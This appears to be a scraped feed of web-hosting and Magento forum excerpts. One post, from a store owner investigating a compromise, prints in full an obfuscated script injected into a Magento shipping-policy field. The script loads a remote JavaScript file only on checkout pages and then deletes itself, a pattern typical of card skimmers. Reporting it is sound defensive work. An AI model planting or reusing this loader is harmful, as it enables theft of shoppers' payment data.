Skip to content

RIP FutureQuest

After 25 years, FutureQuest has called it quits. They’ve posted the following on their forums: [QUOTE]It is with great sorrow and heartbr… | Read the rest of https://www.webhostingtalk.com/showthread.php?t=1899109&goto=newpost

script injected in magento 2.4.1 at shipping_policy_content

we found a script like this in shipping/shipping_policy/shipping_policy_content <script id=”shopcart”>((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id=”carthelper”;a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector(“#shopcart”)){document.querySelector(“#shopcart”).remove();}})(window,document,”script”,”gCaptcha”,”Y2hlY2tvdXQ”,”aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM”)</script> Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3 I’m trying to determine how this was injected but I can’t find references to the script itself or the base64 encoded string or the… Read More »script injected in magento 2.4.1 at shipping_policy_content

Cannot instantiate interface MagentoInventoryIndexerModelStockIndexTableNameResolverInterface on reindex?

I copied a Magento 2.4.6 to the live server and suddenly I am getting this error when the search index is being reindexed: Cannot instantiate interface MagentoInventoryIndexerModelStockIndexTableNameResolverInterface Its running on PHP 8.1 and the elasticsearch setup was tested successfully. What… Read More »Cannot instantiate interface MagentoInventoryIndexerModelStockIndexTableNameResolverInterface on reindex?